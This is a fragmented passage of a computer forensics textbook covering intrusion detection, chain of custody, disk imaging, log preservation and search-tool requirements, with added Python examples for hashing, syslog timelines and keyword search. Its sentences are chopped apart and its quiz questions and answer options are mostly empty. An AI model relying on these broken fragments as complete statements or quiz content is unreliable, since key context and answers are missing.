Hackers often break into computers through well-documented holes (they read
security alerts, too) when users don’t install patches
...
This can happen when administrators forget to disconnect an ex-employee’s
system from the modem or network
...
A shared terminal that’s not attached to any one employee is often overlooked
when security updates are done
...
You encrypt important data on your server, but you neglect to encrypt remote
backups
...
Security is an ongoing task
...
Intrusion detection systems (IDSs) come in several forms, with the most commonly deployed called “host” and “network” systems
...
A host-based IDS is a piece of software that runs on an individual computer on the network—a Web or application server, for instance
...
Host-based systems are particularly valuable in monitoring insider threats because they can show when unauthorized personnel attempt to access prohibited data or resources
...
Network-based IDSs are generally “promiscuous” in that they look at every
packet on a network or network segment
...
A desktop IDS offers file-level protection
...
The desktop IDS is also very useful in trojan horse detection
...
Honeypots emulate known vulnerabilities or other systems, or are modified production systems that create “caged” environments
...
Once breached, the resulting information gathered during the attack is analyzed to learn about the tools, tactics, and
motives of the possible intrusion
...
1 in Appendix F is a provisional list of actions for advanced computer
forensics
...
A number of these advanced computer
forensics topics have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Hackers often break into computers through well-documented
holes (they read security alerts, too) when users install patches
...
True or False? Hackers often enter networks through old computers that are no
longer in use
...
3
...
4
...
5
...
Multiple Choice
1
...
A
number of common ports are scanned and attacked, except:
A
...
Telnet (23)
C
...
DNS (53)
E
...
Private citizens have legitimate reasons to do the following, except:
A
...
Protect flaws
C
...
Prevent legal or medical records from falling into strangers’ hands
E
...
You only have three directions to go with hacking, except:
A
...
B
...
C
...
D
...
4
...
Unauthorized access points
B
...
Denial-of-service (DoS) attacks
D
...
Peer-to-peer sabotage
5
...
Break into computers through well-documented holes (they read security
alerts, too) when users don’t install patches
...
Enter networks through old computers that are no longer in use
...
C
...
D
...
E
...
Exercise
A large financial institution routinely used a computer forensics specialist team
(CFST) to investigate corporate computer-usage policy violations
...
So, how
was the CFST able to go about conducting their investigations?
HANDS-ON PROJECTS
A large insurance company used a CFST for incident response activities and deployed the CFST on 36,000 machines within their organization
...
Organizations face many challenges and potential repercussions when terminating employees
...
How did the CFS go about
conducting the investigation?
Optional Team Case Project
A large insurance institution uses a CFS to investigate suspicious insurance claims
and to determine if there is employee collaboration in fraudulent claims
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001
...
, “Encryption Wars: Early Battles” (© 2000
IEEE), IEEE Spectrum, 445 Hoes Lane, Piscataway, New Jersey 08855,
2001
...
, i-mode Crash Course, McGraw-Hill, New York, 2002
...
, Electronic Commerce, 3rd ed
...
[5] Vacca, John R
...
[6] Vacca, John R
...
21 Summary, Conclusions, and Recommendations
Computer forensics may sound like a media-generated catchphrase, but its
principle is actually quite simple
...
Computer forensics applies those same principles to digital evidence recovery
...
To help create cooperation
between the United States and other nations, the G8 group (http://www
...
org/)
of major industrialized nations has proposed six principles for procedures relating
to digital evidence, which it defines as information stored or transmitted in binary
form that may be relied on in court:
1
...
2
...
3
...
4
...
5
...
6
...
All computer forensic policy and procedures should be developed from these
principles
...
Perpetrators range from 13-year-olds to trained experts paid by
rogue nations to infiltrate and steal proprietary information; organization insiders
could also perpetrate similar crimes
...
If a network manager
discovers contraband (illegal or illegally acquired equipment), he or she should simply
turn the matter over to law enforcement
...
Within network-related crimes, “innocent” computers are often used as instrumentalities—they are used to commit further crime, either to launch denial-of-service attacks or to provide a pass-through for the criminal
...
Computers classified as mere evidence are usually not seized
...
Before getting into specifics on how this is done, let us first examine some policies that should be in place before the need for forensics arises
...
When formulating all policies regarding computer forensics, a balance must be
struck between expediency and following a proper chain of command
...
Each organization needs to decide how far to proceed up the hierarchy
when responding to different levels of attacks
...
A recent study performed jointly by the Computer
Security Institute (CSI) and the National Infrastructure Protection Center arm of
the FBI found that a significant number of attacks (84%) came from disgruntled employees
...
When dealing with internal policies, desktop examination is a crucial element,
whether the matter is simple misuse or corporate espionage
...
Certain laws exist to provide some privacy to the end user [3]
...
The law contains certain provisions that should be incorporated into every policy
...
Policy rules regarding an open Internet service provider (wherein anyone
can pay and join) are significantly more stringent
...
”
Law enforcement commonly refers to a request under Title 18 USC 2703(f) as sending an “F letter” (referencing subsection (f) of the statute, which lets a government entity require a provider to preserve records pending further legal process) to a provider
...
A
company should immediately take the steps mandated via the phone call, without
waiting for the letter’s arrival
...
There should be appropriate policies in place to handle this possibility,
from the administrative receiving end all the way to placement of the backed-up
records
...
How does a manager know if the staff possesses the requisite knowledge to
create sound corporate policies on evidence recovery? This is an extremely difficult
question to answer, but one approach might be to determine who, typically, would
not be qualified
...
A dedicated network security specialist may or may not have the
appropriate knowledge, but this is probably the best place to start looking
...
Mapping the Labyrinth
Even though the corporate computer forensics specialist is not a law enforcement
officer, he or she will still find merit in following the same forensic procedures
...
From the moment a computer
is recognized as compromised, documenting should begin
...
Documentation should include the
basic “who, what, when, and where” criteria and how long each individual spent diagnosing and repairing any problems, which is used to determine damages
...
It is essential for companies to keep track of their damages when responding to
an intrusion threat for purposes of criminal prosecution
...
Thus, companies
are asked to keep track of their costs so that intruders can be effectively prosecuted
...
Afterward, the hard
drive is usually removed and reinstalled on another machine
...
What imaging software you choose to use is largely a personal preference, provided that it satisfies the criterion of providing complete bit-by-bit imaging
...
Some popular choices (although this author and publisher are not endorsing any) are Safeback (http://www
...
com
/safeback
...
digitalintel
...
encase
...
html)
...
It may be an option
...
This is done by proper hash
testing, discussed later on
...
There are several options and opinions within the field regarding how best to handle a Unix box
...
Regardless, the first step is, as always, to document the state of the system before touching it
...
The next step is to record the running processes, which point to evidence still in RAM, using
the command line “ps aux” (BSD-style) or “ps -ef” (System V-style), depending on the Unix version
...
If any are found, the associated RAM contents should be saved
...
A computer forensics specialist should also be familiar with
programs such as lsof (List Open Files), beneficial in isolating trouble spots
...
After RAM documentation, there are several options: one is to sync, halt, reboot, and mount the drives from a CD
...
This procedure also changes
the state of the hard drive, which is a possible concern
...
Afterward, the drive can be
mounted dirty, and bit-stream copies can be created from the original
...
This is not a command that can be covered briefly, as it has many
options and parameters, such as naming the input and output devices (if= and of=), setting the block size (bs=), and converting data while copying it (conv=)
...
Truth Serum
No matter what operating system (or program used to create copies) is being utilized, some type of verification software should be part of the forensics equation
...
This is accomplished by using
mathematical algorithms, called “hash functions,” which calculate hash values
(also known as checksums, or fingerprints) based on the original file or image
...
A file-hashing utility should always be used to verify the copying of all files or
images
...
The hash values should
be recorded and kept in order, along with such data as when the program was run,
who ran it, and what program was used—valuable information for the event reconstruction typical of court cases
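The bit-stream copy of the previous section and the hash verification of this one, carried through together as an added example that is not code from the original text or from any of the imaging products it names. The copy reads the source once in fixed blocks, the way `dd if=... of=... bs=1M` would, computes MD5 and SHA-256 on that same pass, then re-hashes the finished image and records who ran the copy, with which tool, and when. The sample “evidence” bytes (including a run of nulls followed by stale text standing in for slack), the operator name and the tool string are constructed for the demo; in practice `src` is a raw device behind a write blocker.

```python
"""Bit-stream image of a source with hashes computed as the bytes are read, the copy
re-hashed to prove it matches, and a custody record of who ran what and when.

Added example: it reproduces in Python what `dd if=... of=... bs=1M` followed by
md5sum/sha256sum of both files would give. The sample 'evidence' bytes, the operator
name and the tool string are constructed for the demo and are not from the original text.
Real use means pointing `src` at a raw device (e.g. /dev/sdb) behind a write blocker."""
import hashlib
import os
import tempfile
from datetime import datetime, timezone

ALGOS = ("md5", "sha256")   # MD5 is what older tools record; keep SHA-256 alongside it
BLOCK = 1 << 20             # 1 MiB reads, the equivalent of dd's bs=1M


def hash_file(path, block=BLOCK):
    """Hex digests of a file for every algorithm in ALGOS, read in fixed-size blocks."""
    hashes = {name: hashlib.new(name) for name in ALGOS}
    with open(path, "rb") as fin:
        while chunk := fin.read(block):
            for h in hashes.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashes.items()}


def bitstream_copy(src, dst, block=BLOCK):
    """Copy every byte of src to dst, hashing the source on the same pass so the
    original is read exactly once. Returns (bytes_copied, source_hashes)."""
    hashes = {name: hashlib.new(name) for name in ALGOS}
    copied = 0
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        while chunk := fin.read(block):
            fout.write(chunk)
            copied += len(chunk)
            for h in hashes.values():
                h.update(chunk)
        fout.flush()
        os.fsync(fout.fileno())
    return copied, {name: h.hexdigest() for name, h in hashes.items()}


def image(src, dst, operator, tool="bitstream_copy.py (example)"):
    """Image src to dst, verify the copy by re-hashing it, and return the custody record."""
    started = datetime.now(timezone.utc)
    size, source_hashes = bitstream_copy(src, dst)
    image_hashes = hash_file(dst)
    return {
        "source": src, "image": dst, "bytes": size,
        "operator": operator, "tool": tool,
        "started_utc": started.isoformat(),
        "finished_utc": datetime.now(timezone.utc).isoformat(),
        "source_hashes": source_hashes, "image_hashes": image_hashes,
        "verified": source_hashes == image_hashes,
    }


# Constructed stand-in for a seized file: real content, a run of nulls, then bytes that
# play the role of slack left over from an earlier file in the same cluster.
SAMPLE = (b"MZ\x90\x00" + b"quarterly-figures-draft\n" * 200
          + b"\x00" * 512 + b"old memo fragment: meet at 9pm, bring the tapes\n")


def demo():
    """Image a constructed sample, then show that a one-byte change is caught."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "evidence.bin")
        with open(src, "wb") as f:
            f.write(SAMPLE)
        record = image(src, os.path.join(tmp, "evidence.img"), operator="examiner-01")
        # Simulate a corrupted or tampered image: flip one byte, re-hash, compare.
        tampered = os.path.join(tmp, "evidence-tampered.img")
        data = bytearray(SAMPLE)
        data[10] ^= 0x01
        with open(tampered, "wb") as f:
            f.write(data)
        tampered_ok = hash_file(tampered) == record["source_hashes"]
        return {"record": record, "tampered_verified": tampered_ok,
                "expected_bytes": len(SAMPLE)}


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

The record is what goes into the case file: the two digest sets agreeing is the proof that the image is bit-for-bit identical, and the timestamps, operator and tool fields are the “when, who and what program” the text says must be kept for event reconstruction.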
...
What logs an
organization chooses to keep, and how long it will keep them, largely depends on
available space and average number of entries received
...
Although such probes are annoyances that are not even necessarily illegal, it may be important to keep logs of them
...
To keep logs from being destroyed by malicious intrusions, system operators
will often output some logs to a printer or a CD-ROM device; this can be an expensive route, but it frequently offers greater security
...
Different versions of Unix have their logs in different areas
...
One of the primary logs used in computer forensics is syslog, the main system
log containing a variety of important messages
...
In addition, routers and firewalls
can be configured to add messages to the syslog
...
Some popular logs that may prove useful include acct, aculog, lastlog, loginlog, sulog, utmp(x), wtmp(x), void
...
Remember that when any of
these logs are copied, a hashing program should be used to ensure proper backup
creation
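Event reconstruction from syslog, as an added example that is not code from the original text: it parses BSD-style syslog lines (sshd, su and a firewall message forwarded to the same log) into a normalized, time-ordered timeline and then pulls out the one sequence an examiner wants first, repeated failed logins from a source followed by a success from that same source. The log lines, hostnames and addresses are constructed for illustration, and because classic syslog lines carry no year, the year is an assumption the caller supplies.

```python
"""Parse BSD-style syslog lines into a normalised event timeline and pull out the
sequence a signature or a human would want to see: repeated failed logins from one
source followed by a success.

Added example; the log lines, hostnames and addresses are constructed for illustration
and are not from the original text. Classic syslog lines carry no year, so the year is an
assumption supplied by the caller (here 2005)."""
import re
from collections import namedtuple
from datetime import datetime

Event = namedtuple("Event", "ts host prog kind user src")

HEADER = re.compile(r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
                    r"(?P<host>\S+) (?P<prog>[\w./-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")

# Message patterns that matter for event reconstruction. Each yields (kind, user, src).
PATTERNS = [
    ("ssh_fail", re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")),
    ("ssh_ok",   re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)")),
    ("su_fail",  re.compile(r"FAILED SU \(to (?P<user>\S+)\) (?P<src>\S+)")),   # src = who tried
    ("fw_drop",  re.compile(r"DROP .*SRC=(?P<src>\S+) .*DPT=(?P<user>\d+)")),   # user slot = port
]

# Constructed sample log: three failures then a success from one address, an unrelated
# failure, a failed su, a firewall drop forwarded to syslog, and a cron line that is noise.
SAMPLE_LINES = """\
Mar 12 02:14:07 web1 sshd[4101]: Failed password for root from 203.0.113.9 port 4412 ssh2
Mar 12 02:14:09 web1 sshd[4101]: Failed password for root from 203.0.113.9 port 4413 ssh2
Mar 12 02:14:12 web1 sshd[4101]: Failed password for root from 203.0.113.9 port 4414 ssh2
Mar 12 02:14:15 web1 sshd[4102]: Failed password for invalid user admin from 198.51.100.7 port 3310 ssh2
Mar 12 02:14:41 web1 sshd[4103]: Accepted password for root from 203.0.113.9 port 4420 ssh2
Mar 12 02:15:02 web1 su[4120]: FAILED SU (to root) bob on /dev/pts/2
Mar 12 02:16:30 fw1 kernel: DROP IN=eth0 SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP DPT=23
Mar 12 02:17:00 web1 cron[4200]: (root) CMD (run-parts /etc/cron.hourly)
""".splitlines()


def parse_syslog(lines, year=2005):
    """Turn raw lines into Events sorted by time. Lines that match none of the security
    patterns (cron above) are left out of the timeline; the year is the caller's assumption."""
    events = []
    for line in lines:
        m = HEADER.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        for kind, pat in PATTERNS:
            pm = pat.search(m["msg"])
            if pm:
                events.append(Event(ts, m["host"], m["prog"], kind, pm["user"], pm["src"]))
                break
    return sorted(events)


def timeline(events):
    """Human-readable, time-ordered lines for the report."""
    return [f"{e.ts.isoformat()} {e.host} {e.prog} {e.kind} user={e.user} src={e.src}"
            for e in events]


def brute_force_successes(events, window_s=300, min_failures=3):
    """For each successful login, count failed logins from the same source in the preceding
    window. Enough failures followed by a success is the pattern worth investigating first."""
    hits = []
    for ok in (e for e in events if e.kind == "ssh_ok"):
        fails = [e for e in events if e.kind == "ssh_fail" and e.src == ok.src
                 and 0 <= (ok.ts - e.ts).total_seconds() <= window_s]
        if len(fails) >= min_failures:
            hits.append((ok.src, ok.user, len(fails), ok.ts.isoformat()))
    return hits


if __name__ == "__main__":
    evs = parse_syslog(SAMPLE_LINES)
    print("\n".join(timeline(evs)))
    print("suspicious:", brute_force_successes(evs))
```

Feeding router and firewall messages into the same syslog, as the text suggests, is what lets the last step work: once the compromised account is identified, the firewall drop from the same address a few minutes later is already on the same timeline.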
...
evt, secevent
...
evt—
are kept in the %SystemRoot%\system32\config directory and are normally
viewed using Microsoft’s built-in Event Viewer
...
It is important to have a current list
of programs and services installed and to have a checklist for log preservation
...
State tables show actions that
take place either in real time or in the immediate past
...
The Netstat command displays network connections, routing tables, interface statistics, masquerade connections,
netlink messages, and multicast memberships
...
MAC addresses do not cross routers; a router rewrites the link-layer source and destination addresses on every packet it forwards, so only the first-hop device ever sees the originating machine’s MAC address
...
If
the router is keeping the correct logs, and a packet has only traveled over a few
routers, this information may be useful
...
There are special steps for state table preservation
...
The log
should then be hashed and preserved with other evidence
...
These files should be hashed along with the original
...
More important still is the method by
which those media are handled
...
Obviously, care must also be taken to
protect the media from various environmental elements: preferably, it should be
placed in an appropriate container, taped shut, then initialed and dated
...
Some type of standard
tracking method should be used with every piece of evidence
...
There are two types of costs: the cost of doing nothing
about data-evidence recovery and the cost of doing something about it
...
680
Computer Forensics, Second Edition
Personnel costs associated with computer forensics are dependent on several
factors, including the number of different operating systems the person is expected
to know
...
Costs are
fluid and should be taken only as ballpark figures
...
Costs for materials examination may
run from $40 to $700 for one case
...
It is possible, of course, to hire an outside forensics
specialist
...
There is a wide range of options when it comes to the software
...
There are also costs for password cracking, both for software and the time necessary on a computer (cost per CPU cycle)
...
Tracking all of these costs is extremely helpful if any court proceedings occur
...
Every organization
should consider forming a computer security incident response team (CSIRT, sometimes referred to as a Computer Emergency Response Team, or CERT), if one hasn’t
already been established
...
This can
help create a safer environment for an organization’s employees, customers, and
business partners
...
For the IT manager, that means the server
room, where the Internet has brought not only the promise of a worldwide audience but also the threat of worms, hackers, and cyberterrorism
...
One week after the terrorist destruction of the World Trade Center, the Nimda worm
(released on September 18, 2001) ran rampant through the Internet
...
Summary, Conclusions, and Recommendations
681
Much of enterprise IT security has been built around firewalls or monitoring
products meant to keep the bad guys out
...
The role of computer forensics in the current rush to security cannot be overstated
...
Developing systems that have what appears to be
an effective front end, but in reality are porous, is at least partly to blame for the lax
airport security programs that had such a horrific result and still do
...
Too
much data is often more dangerous than too little, as overwhelming data can give
you a false sense of security
...
The war on terror will be marked by huge amounts of data,
gathered electronically and in person, that will be analyzed to focus on a small
group of fanatics
...
The IT sector through computer forensics has a crucial role to play in stopping the terrorists before they can strike again
...
Government officials estimate that only
20% of such incidents are reported because individual agencies either don’t have
the technical sophistication to discover the crimes or want to keep bad news quiet
...
Computer compromises are a serious issue
...
In addition, there’s an ingrained reluctance on the
part of agencies to work together to combat computer crimes
...
During the first three months of 2004, the Federal Computer Incident Response Center (FedCIRC), the central incident-reporting point for civilian federal agencies,
recorded 88 root compromises at civilian nondefense federal agencies, which put it
on pace to exceed the 2003 total
...
A root compromise occurs when an intruder gains administrator (root) privileges on a system, giving the attacker the ability to do things such as copy documents, alter data, or plant malicious code
...
uscert
...
FedCIRC doesn’t know whether they’re seeing a change in
the rate of reporting, the rate of detection, or the rate of penetration
...
Agencies are already required by
law to report breaches to FedCIRC as a result of the Government Information Security Reform
Act (GISRA) approved in 2000
...
The 9-11 attacks and the recent issuance of educational visas to the dead terrorists have borne that out
...
For example, it said in a
report recently released that it found significant security weaknesses at all of the 24
agencies where it conducted audits of IT security readiness
...
Cost of Computer Crime Exploding
According to results of the 2004 Computer Crime and Security Survey [3a] recently released, intellectual property theft and security breaches are on the rise and
the costs of those intrusions are skyrocketing
...
The survey also shows that the cost of that theft is exploding
...
The amount is up from almost $101 million in 2003 and $64 million in 2000
...
That means
theft of intellectual property accounts for 44% of all losses tabulated in the survey,
despite the fact that such a small number of companies could quantify it
...
The problem is that many companies
aren’t aware that they should be protecting the information that fuels their businesses—such as marketing plans, source codes, and research information
...
Industrial espionage is giving way to information age espionage
...
You bribed them
...
But why risk someone getting caught
when you can just hack in and take what you need? The survey also points to several other aspects of computer security that are on the rise:
Forty-four percent of respondents reported outside system penetration
...
Forty-two percent detected denial-of-service attacks
...
In 2004, 683 people were able (and willing) to quantify financial losses
...
Forty percent of respondents reported security breaches to law enforcement
agencies
...
Industry analysts and corporate users agree that more administrators should be
focused on protecting their valuable proprietary information
...
What they’re not doing is protecting their own information,
records, plans, and technologies
...
It’s not that upper management doubts the information’s
value, but rather that upper management feels that there isn’t enough threat to warrant any significant attention
...
Companies developing a new drug or a new widget may understand how sensitive that product information is, but they find it hard to protect
...
It’s difficult to enforce protection of information while still letting people at the information
...
It’s clearly a dangerous world, and will continue so for years to come—possibly even get worse—despite the widespread deployment of computer forensics and security technologies
...
RECOMMENDATIONS
Details of the arrest of U
...
Federal Bureau of Investigation Special Agent Robert P
...
The
FBI conducted a search of Mr
...
Hanssen wrote to his Russian handlers in 2000
...
Few of us will ever be in as tense a situation as the one the FBI faced recently with
Mr
...
Mess that up from an evidence-handling perspective and a major international
espionage case could evaporate, but no matter where you work in the computer security field, you may one day find yourself faced with a tough investigative challenge—looking for the right tools to accomplish an incredibly important job, facing
near impossible deadlines—and always with the thought in the back of your mind
that if you mess something up, life as you know it could change drastically
...
Computers being what they are, it takes a
computer and a robust set of applications to analyze another computer in such a
manner that the results of the analysis are thorough, sound, unbiased, and repeatable
...
Each developer has his or her own unique perspective on the
needs of the investigative community and his or her own approach as to how to
meet those needs, but few have started the software-development process with a
well-stated computer forensic analysis requirements document
...
The knowledge, skills, and experience of the analyst at the keyboard can also play a significant role in the performance of a tool when no thorough requirements document exists
...
Let’s
start with a requirements definition
...
With luck, where tools fall short of meeting requirements,
developers will take the results to their labs and work to improve the tools
...
Requirements Definition
Let’s begin this look at requirements by identifying certain capabilities that a forensic examiner needs, based on tasks the examiner must perform to complete a thorough, unbiased, and forensically sound examination of computer media
...
It is also not intended to mandate that any specific software
tool be used in any specific set of circumstances
...
This requirements definition also takes into account that law enforcement officers have different requirements than corporate security and investigations personnel
...
Corporate security and investigations personnel do typically have some
authority to preview systems, determine which ones may have relevant evidence,
and preserve evidentiary images of systems deemed to contain relevant evidence
...
At a fairly fundamental level, the forensic analysis toolbox needs certain capabilities
...
That requirement exists because certain data in the logical file system may not be readily available or readable at the physical level
...
exe
...
pdf) files are, likewise,
physically written to disk in a manner that obscures the textual content of the document
...
A search of computer media at the physical level also might miss plain text
words in a document if the document is fragmented physically on disk and the
word of interest is partially contained at the end of one sector and the beginning of
a noncontiguous sector
...
This requirements definition also sets forth minimum requirements for functionality, taking into account a wide variety of technical, logistical, and legal circumstances
...
An investigator at a crime scene must be able to identify computer
systems or media possibly containing digital evidence relevant to the case
...
Any evidence on the media is possibly lost
...
After preserving the evidence, an investigator will conduct a series of examinations (analysis) of the data on the media to extract relevant
information from it
...
The capabilities an examiner requires for any one step of the process may
sometimes overlap with capabilities required for other steps
...
The following capabilities are useful as
a starting point to develop a set of minimum requirements:
An investigator requires a capability to simultaneously preview a large number
of systems on site to determine which ones contain relevant evidence
...
The search tool must be able to reliably report the physical location on the
media where responsive data were found
...
An investigator requires an ability to generate a listing of all logical files in a file
system
...
An investigator requires an ability to identify and process special files
...
Investigators require the capability to make forensically sound images of a wide
variety of media
...
Investigators require the capability to perform a sector-by-sector comparison
of two pieces of media to determine where they differ
...
Simultaneously Preview a Large Number of Systems on Site
In some situations, identifying which computers or media at a scene may contain
information or data of evidentiary value is fairly straightforward
...
In other
cases, particularly where the allegation concerns activities of insiders, it may not be
so easy to determine which systems contain information of evidentiary value
...
In most cases, an initial search at the physical level of the media may be sufficient to determine if a specific computer system or piece of media contains relevant information and should be imaged or preserved for further, more detailed
analysis
...
The investigator must decide, based on the circumstances of
the case, whether a fruitless search at the physical level of the media is sufficient to
exclude the media from further processing
...
Validated Read-Only Methodology
For previewing media on scene, an investigator requires a capability to preview
media using tools and methodologies that have been tested under various circumstances and validated not to make changes to the original media
...
Unintentionally
modifying date/time stamps in particular could unnecessarily complicate the
evidence-analysis process
...
Whether the preview process will be done via a remote connection to a computer system or will be executed locally on the system, the investigator must know exactly what the boot process is, ensure that the boot process used
does not make changes to any of the data on the media to be previewed, and ensure
that the preview tools and methodologies are forensically sound
...
A local preview of media involves using a controlled boot process (booting the suspect machine
from a validated forensic boot medium, so that its own operating system never runs and nothing is written to its disks) and conducting the review on that system
...
Like a local preview, a remote preview must be conducted in such a manner
that it does not make changes to the media being previewed
...
Using a remote preview capability may limit the number of simultaneous iterations that can be conducted because it requires more hardware, but in
cases where only a few systems need to be previewed, a remote capability could be
very useful
...
No matter the exact
mechanism used, the preview process must be forensically sound and must not
make changes to the media being previewed
...
The
search tool must have the ability to search both ASCII and Unicode text; in practice that means the UTF-16LE encoding Windows uses for file names, registry strings, and many document formats, in which every ASCII character is followed by a zero byte, so a plain ASCII search will not find it
...
Other operating systems can store text in Unicode encodings (UTF-16 or UTF-8)
as well as in ASCII
...
Preferably, a single pass through the media will search using
both character sets simultaneously
...
If the tool cannot see and search all sectors of the media, the resultant search may
not be thorough enough to establish that evidence either does or does not reside on
the media
...
Tools that require separate passes through the media to search for each keyword would unnecessarily
constrain the investigator in terms of both time and efficiency, especially when
searching one of today’s 80-GB and larger hard drives
...
Some file type
headers and all binary files will contain nonprintable ASCII characters
...
Report the Physical Location on the Media
This report could use either the cylinder-head-sector (CHS) or logical block addressing (LBA) address of the responsive data; on modern drives the CHS values are a translation presented by the BIOS or controller, so the LBA is the unambiguous figure to record, together with the byte offset within the sector
...
The search tool must be able to show results in context
...
The investigator must be able
to discern the context within which a word or phrase resides on the media to determine whether the context is relevant to the investigation
...
Otherwise, the investigator must use a hex editor to preview each sector
containing the key word to determine whether it actually contains relevant data
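The search requirements above (every sector from sector 0, ASCII and Unicode in a single pass, a reliable physical location for each hit, results shown in context) and the earlier fragmentation caveat can be demonstrated together. The following is an added example and not code from the book or any product: it builds a small constructed disk image, scans it once with a combined ASCII/UTF-16LE pattern, reports each hit's LBA, in-sector offset and context, and then shows that a keyword split across two non-contiguous sectors is found only when the file is reassembled from its allocation chain. Sector size, layout, file name and keywords are assumptions.

```python
"""Added example, not from the book: keyword search over a constructed disk
image. One regular expression carries every keyword in both ASCII and
UTF-16LE so the media is read in a single pass; each hit is reported with its
LBA, offset within the sector and surrounding context. The image also shows
the fragmentation case: a word split across two non-contiguous sectors is
missed by the physical-level scan but found once the file is reassembled
from its allocation chain. Sector size, layout and keywords are assumptions."""
import re

SECTOR = 512
KEYWORDS = ["merger", "Zurich"]

def build_image():
    """Constructed 16-sector image (8 KiB) and a fake allocation table.
      LBA 3, LBA 9 : two non-contiguous fragments of plans.txt
      LBA 6        : unallocated sector holding a deleted-file remnant (ASCII)
      LBA 12       : a UTF-16LE string, as Windows applications store text
    All other sectors are zero-filled."""
    img = bytearray(16 * SECTOR)
    body = b"x" * 508 + b"merger talks are confidential until the Zurich meeting.\n"
    img[3 * SECTOR:4 * SECTOR] = body[:SECTOR]                         # ends with b"merg"
    img[9 * SECTOR:10 * SECTOR] = body[SECTOR:].ljust(SECTOR, b"\0")   # starts with b"er t"
    img[6 * SECTOR:7 * SECTOR] = b"deleted draft: zurich wire transfer\n".ljust(SECTOR, b"\0")
    img[12 * SECTOR:13 * SECTOR] = "Subject: Merger".encode("utf-16-le").ljust(SECTOR, b"\0")
    return bytes(img), {"plans.txt": [3, 9]}

def compile_keywords(keywords):
    """One alternation with a capture group per (keyword, encoding) pair; the
    matched group number tells which keyword and encoding produced a hit."""
    parts, table = [], []
    for kw in keywords:
        for enc in ("ascii", "utf-16-le"):
            parts.append(b"(" + re.escape(kw.encode(enc)) + b")")
            table.append((kw, enc))
    return re.compile(b"|".join(parts), re.IGNORECASE), table

def context(data, start, end, width=24):
    """Printable text around a hit; zero bytes are dropped so UTF-16LE reads as text."""
    lo, hi = max(0, start - width), min(len(data), end + width)
    return data[lo:hi].replace(b"\0", b"").decode("ascii", "replace")

def physical_search(image, keywords, sector=SECTOR):
    """Scan every byte from LBA 0 to the end of the device, ignoring any file
    system. (A real tool reads the device in chunks that overlap by one byte
    less than the longest pattern, so hits on chunk boundaries are not lost.)"""
    rx, table = compile_keywords(keywords)
    hits = []
    for m in rx.finditer(image):
        kw, enc = table[m.lastindex - 1]
        hits.append({"keyword": kw, "encoding": enc, "offset": m.start(),
                     "lba": m.start() // sector, "sector_offset": m.start() % sector,
                     "context": context(image, m.start(), m.end())})
    return hits

def logical_search(image, allocation, keywords, sector=SECTOR):
    """Reassemble each file from its allocation chain and search the result;
    every hit is mapped back to the LBA of the sector that holds it."""
    rx, table = compile_keywords(keywords)
    hits = []
    for name, chain in allocation.items():
        data = b"".join(image[lba * sector:(lba + 1) * sector] for lba in chain)
        for m in rx.finditer(data):
            kw, enc = table[m.lastindex - 1]
            off = m.start()
            hits.append({"file": name, "keyword": kw, "encoding": enc, "file_offset": off,
                         "lba": chain[off // sector], "sector_offset": off % sector,
                         "context": context(data, off, m.end())})
    return hits

def demo():
    """Physical hits: 'zurich' in unallocated LBA 6, 'Zurich' in LBA 9 and the
    UTF-16LE 'Merger' in LBA 12; the ASCII 'merger' straddling LBA 3 and LBA 9
    appears only in the logical result."""
    image, allocation = build_image()
    return physical_search(image, KEYWORDS), logical_search(image, allocation, KEYWORDS)
```

Both searches report the LBA and in-sector offset so an examiner can go straight to the sector with a hex editor; the logical result additionally names the file and the offset within it, which is what ties a hit to a document rather than to a location on the platter.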
...
The hash process must take into account every bit of every byte of every sector on the media, from sector 0 to the last physical sector, regardless of whether any
specific sector is included in any logical volume on the media
...
For
hard drives, the 128-bit message digest 5 (MD5) algorithm has traditionally been preferred; because practical MD5 collisions have since been demonstrated, current practice is to record a SHA-256 digest alongside MD5 so the image remains verifiable with either
...
If an investigator
begins with a logical search to preview media, and that search produces no relevant
results, the investigator may have to follow up with a search of the physical media
to ensure a thorough search
...
For instance, a hard
drive may be partitioned and formatted to boot multiple operating systems, each
using a different file system
...
As with the physical level search, the search tool must have the ability to use
both ASCII and UNICODE character sets
...
The search tool must be capable of searching all sectors within the logical
boundaries of the file system
...
For reasons already stated, the
search tool must be able to use a keyword list
...
The tool that creates this list
must be able to write the list of files to appropriate media, whether that is a network-accessible volume, a local hard drive not under investigation, or some appropriate
removable media connected to the analysis machine
...
In addition, an investigator requires an ability to generate a listing of all the
date/time stamps an operating system may store in relation to each file in the file
system
...
Those dates/times may include Date/Time Last Modified,
Date/Time Last Accessed, or Date/Time Created
...
Furthermore, an investigator requires the ability to identify and generate a listing of all deleted files in the file system
...
Search the Contents of the Regular Files
Searching the contents of the regular files is a particularly important requirement
for the search tool
...
Some search tools that operate at the logical level of the media do not quite
meet this requirement, because most operating systems keep a Date/Time Last Accessed time stamp and will attempt to update this stamp when the search tool opens
or closes the file
...
If a search tool allows the operating
system to update Date/Time Last Accessed when the tool runs, then the investigator
must take steps to preserve those date/time stamps prior to using the search tool
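The listing of date/time stamps required earlier and the last-accessed caveat just described fit one small tool: take the listing with a metadata-only call before any content is read, then take it again afterwards and report what moved. The following is an added example, not code from the book; the directory tree and file contents are constructed, and which timestamps exist (birthtime in particular) depends on the platform.

```python
"""Added example, not from the book: list every file under a directory with
all the timestamps the operating system exposes, using os.lstat() (metadata
only, so the listing itself does not update last-accessed times), and diff
two listings to show which files a later tool touched. The tree and file
contents are constructed."""
import os
import tempfile
from datetime import datetime, timezone

FIELDS = ("size", "mtime", "atime", "ctime", "birthtime")

def iso(ts):
    """Render a POSIX timestamp as ISO 8601 UTC with microseconds."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(timespec="microseconds")
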